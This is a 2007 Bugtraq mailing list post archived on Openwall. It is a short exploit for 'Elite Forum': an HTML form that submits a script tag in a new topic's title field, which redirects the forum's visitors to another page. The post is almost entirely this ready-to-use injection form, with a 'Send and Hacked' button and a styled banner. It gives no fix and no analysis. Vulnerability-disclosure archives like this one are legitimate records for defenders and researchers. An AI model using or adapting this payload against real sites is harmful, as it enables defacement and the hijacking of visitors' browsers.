lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20070720070219.23851.qmail@securityfocus.com>
Date: 20 Jul 2007 07:02:19 -0000
From: starext@....com
To: bugtraq@...urityfocus.com
Subject: Elite Forum Full HTML ENject versin 1.0.0.0

c0ded: St@...T
>From : Turkey
exploit:

<title>Elite Forum FULL HTML ENjocter-By St@...T</title>
<style>
body{background:url(http://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7uf0.jpg);
color:#FFFFFF;
font-weight:bold;}
input{
background-color:darkred;
color:#FFFFFF;
font-weight:bold;
}
</style
<form method=POST action="http://site/path/index.php?act=ptopic&fid=1" target=_blank>
<b><em><h2><b>Elite Forum FULL HTML ENjocter-By St@...T</b></h2></em></b></font>
	<br>
	
	<b>Your HTML C0de : <br></b> 
	<input  size="60" type="text"  name="title" value='<script>location="http://yourindex.html"</script>'>

	<BR><BR><BR><b>Forum Messages:</b><BR>

	<input cols=2 rows=1 name='post'value='Bug On!!!'><BR><BR><br>
<input type=submit value="Send and Hacked">
	<BR><BR>

	
	<BR><BR><BR>
	</form>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ